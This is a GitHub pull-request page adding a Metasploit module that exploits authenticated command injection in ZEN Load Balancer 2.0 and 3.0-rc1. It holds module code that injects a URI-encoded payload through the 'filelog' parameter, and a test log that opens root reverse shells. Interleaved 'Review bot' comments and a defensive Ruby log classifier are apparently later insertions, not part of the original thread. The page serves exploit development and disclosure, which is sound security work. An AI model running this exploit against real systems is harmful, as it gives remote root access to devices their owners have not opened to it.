add ZEN Load Balancer module #817

Merged
merged 1 commit into from Sep 21, 2012

2 participants

@bcoles
Contributor
bcoles commented Sep 21, 2012

Add ZEN Load Balancer v2.0 and 3.0-rc1 Filelog Command Execution exploit module

  • Requires credentials
  • Remote root
  • Tested on:
    • 2.0 stable
    • 3.0-rc1

ZEN Load Balancer v2.0 and 3.0-rc1 Command Execution exploit

@jvazquez-r7
Contributor

Thanks bcoles,

looking into this!

@jvazquez-r7 jvazquez-r7 commented on the diff Sep 21, 2012
modules/exploits/linux/http/zen_load_balancer_exec.rb
+ auth = Rex::Text.encode_base64("#{user}:#{pass}")
+ cmd = Rex::Text.uri_encode(";#{payload.encoded}&")
+ lines = rand(100) + 1
+
+ # send payload
+ print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
+ begin
+ res = send_request_cgi({
+ 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{auth}"
+ }
+ }, 25)
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ fail_with(Exploit::Failure::Unknown, 'Connection failed')
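Review bot: nothing in this hunk guards against `send_request_cgi` returning `nil` when no response arrives within the 25-second timeout passed here, which is a likely outcome once the injected command is busy spawning the reverse shell; `res` is assigned but never checked, so whatever follows the `rescue` should treat a `nil` `res` as "no response" rather than calling methods on it. Agreed that `Exploit::Failure::Unreachable` describes the three connection exceptions rescued here (`ConnectionRefused`, `HostUnreachable`, `ConnectionTimeout`) better than `Unknown`.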
@jvazquez-r7
jvazquez-r7 Sep 21, 2012 Contributor

I think here Exploit::Failure::Unreachable suits better :)

@jvazquez-r7
Contributor

Tested successfully on ZEN Load Balancer v2.0 and 3.0-rc1

msf  exploit(zen_load_balancer_exec) > set RHOST 192.168.1.167
RHOST => 192.168.1.167
msf  exploit(zen_load_balancer_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.167:444 - Sending payload (595 bytes)
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.167:60052) at 2012-09-21 11:22:54 +0200
id;
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 1? [y/N]  y
msf  exploit(zen_load_balancer_exec) > set RHOST 192.168.1.177
RHOST => 192.168.1.177
msf  exploit(zen_load_balancer_exec) > check
[*] 192.168.1.177:444 - Sending check
[*] The target appears to be vulnerable.
msf  exploit(zen_load_balancer_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:444 - Sending payload (151 bytes)
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.177:43453) at 2012-09-21 11:30:21 +0200
id;
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 3? [y/N]  y
[*] 192.168.1.177 - Command shell session 3 closed.  Reason: User exit

merging!
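A defender-side example added here, not part of the PR or the Metasploit module: a small Ruby log classifier that flags requests of the shape this module sends, that is an `index.cgi` request whose `filelog` value is not a plain file name or whose query string carries shell metacharacters once percent-decoded. The access-log format, the constructed sample lines, the `FILELOG_ALLOWED` policy regex and every function name are assumptions for illustration; only the `index.cgi` path and the `filelog`, `nlines`, `action` and `id` parameter names come from the module above.

```ruby
require 'uri'

# Characters that let a parameter value break out of a backtick/shell
# context. Assumed list; adjust to the shell the CGI actually invokes.
SHELL_META = /[;&|`$<>()\n\r]/

# Assumed policy for a legitimate 'filelog' value: a bare file name with
# no path separators and no shell syntax.
FILELOG_ALLOWED = /\A[A-Za-z0-9_.\-]+\z/

# Percent-decode one query component. A malformed escape is kept verbatim
# rather than dropped, so a deliberately broken encoding cannot hide input.
def decode(s)
  URI.decode_www_form_component(s)
rescue ArgumentError
  s
end

# Pull method, path and decoded query parameters out of one access-log
# line. Assumes the common/combined log format ("GET /path?q HTTP/1.1");
# returns nil for lines that do not carry a request.
def parse_request(line)
  m = line.match(%r{"([A-Z]+) (\S+) HTTP/[\d.]+"})
  return nil unless m
  path, _, query = m[2].partition('?')
  params = query.split('&').each_with_object({}) do |pair, h|
    key, _, val = pair.partition('=')
    h[decode(key)] = decode(val)
  end
  { method: m[1], path: path, params: params }
end

# Classify one log line. Returns nil for non-request lines, otherwise a
# hash with :suspicious and, when flagged, the offending :param and :reason.
def classify(line)
  req = parse_request(line)
  return nil unless req
  result = { method: req[:method], path: req[:path], suspicious: false }
  return result unless req[:path].end_with?('/index.cgi')

  # First the strict allow-list on the parameter the module abuses ...
  if (log = req[:params]['filelog']) && log !~ FILELOG_ALLOWED
    return result.merge(suspicious: true, param: 'filelog',
                        reason: "value #{log.inspect} is not a plain file name")
  end
  # ... then a generic metacharacter check on every other parameter.
  req[:params].each do |k, v|
    next unless v =~ SHELL_META
    return result.merge(suspicious: true, param: k,
                        reason: "shell metacharacter in #{v.inspect}")
  end
  result
end

# Constructed sample lines (not taken from the PR or from any real server).
SAMPLE_LOG = [
  '192.0.2.10 - admin [21/Sep/2012:11:22:54 +0200] "GET /index.cgi?nlines=50&action=See+logs&id=2-2&filelog=zenlb.log HTTP/1.1" 200 1834',
  '192.0.2.10 - admin [21/Sep/2012:11:23:01 +0200] "GET /index.cgi?nlines=7&action=See+logs&id=2-2&filelog=%3Bid%26 HTTP/1.1" 200 412',
  '192.0.2.11 - admin [21/Sep/2012:11:23:30 +0200] "GET /index.cgi?nlines=20&action=See+logs&id=2-2&filelog=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
  '192.0.2.12 - - [21/Sep/2012:11:24:00 +0200] "GET /static/zen.css HTTP/1.1" 200 900',
  'not a log line at all',
]

# Returns [line_index, param, reason] for every flagged line.
def flagged_lines(lines = SAMPLE_LOG)
  lines.each_with_index.map do |line, i|
    r = classify(line)
    [i, r[:param], r[:reason]] if r && r[:suspicious]
  end.compact
end

if __FILE__ == $0
  flagged_lines.each { |i, param, reason| puts "line #{i + 1}: #{param}: #{reason}" }
end
```

Of the five constructed lines, the second (decoded `filelog` of `;id&`) and the third (a path-traversal style file name) are flagged by the allow-list, the benign first request and the static asset pass, and the garbage line is ignored. Because the module percent-encodes the injected string, the check decodes before matching; matching on the raw query would miss `%3B` entirely.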

@jvazquez-r7 jvazquez-r7 commented on the diff Sep 21, 2012
modules/exploits/linux/http/zen_load_balancer_exec.rb
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic netcat-e perl bash',
+ }
+ },
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'Privileged' => false,
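Review bot: `'Privileged' => false` on the last line is wrong for this module: the PR description advertises remote root and the `id` output in the test transcript shows `uid=0(root)`, so it should be `true`. Also worth a second look: `'Space' => 1024` bounds the raw command payload, but the module passes `payload.encoded` through `Rex::Text.uri_encode` into a GET query string, so the on-the-wire request can be up to three times that size; either lower `Space` or confirm the target's web front end accepts URIs of that length.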
@jvazquez-r7
jvazquez-r7 Sep 21, 2012 Contributor

must be true

@jvazquez-r7 jvazquez-r7 commented on the diff Sep 21, 2012
modules/exploits/linux/http/zen_load_balancer_exec.rb
+ 'Description' => %q{
+ This module exploits a vulnerability in ZEN Load Balancer
+ version 2.0 and 3.0-rc1 which could be abused to allow authenticated users
+ to execute arbitrary code under the context of the 'root' user.
+ The 'content2-2.cgi' file uses user controlled data from the 'filelog'
+ parameter within backticks.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/'],
+ #['OSVDB', 'None'],
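Review bot: the commented-out `#['OSVDB', 'None']` placeholder should not ship in the merged module; drop it, or replace it with the real identifier once one is assigned. A documentation nit in `Description`: it names `content2-2.cgi` as the vulnerable file, while the request the module actually sends goes to `/index.cgi` with `id=2-2`, so one sentence noting that `index.cgi` presumably dispatches the `See logs` action to `content2-2.cgi` would let a reader tie the request to the bug. Minor wording: "versions 2.0 and 3.0-rc1" rather than "version".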
@jvazquez-r7
jvazquez-r7 Sep 21, 2012 Contributor

I'm going to ask for an OSVDB

@jvazquez-r7 jvazquez-r7 merged commit 6ee2c32 into rapid7:master Sep 21, 2012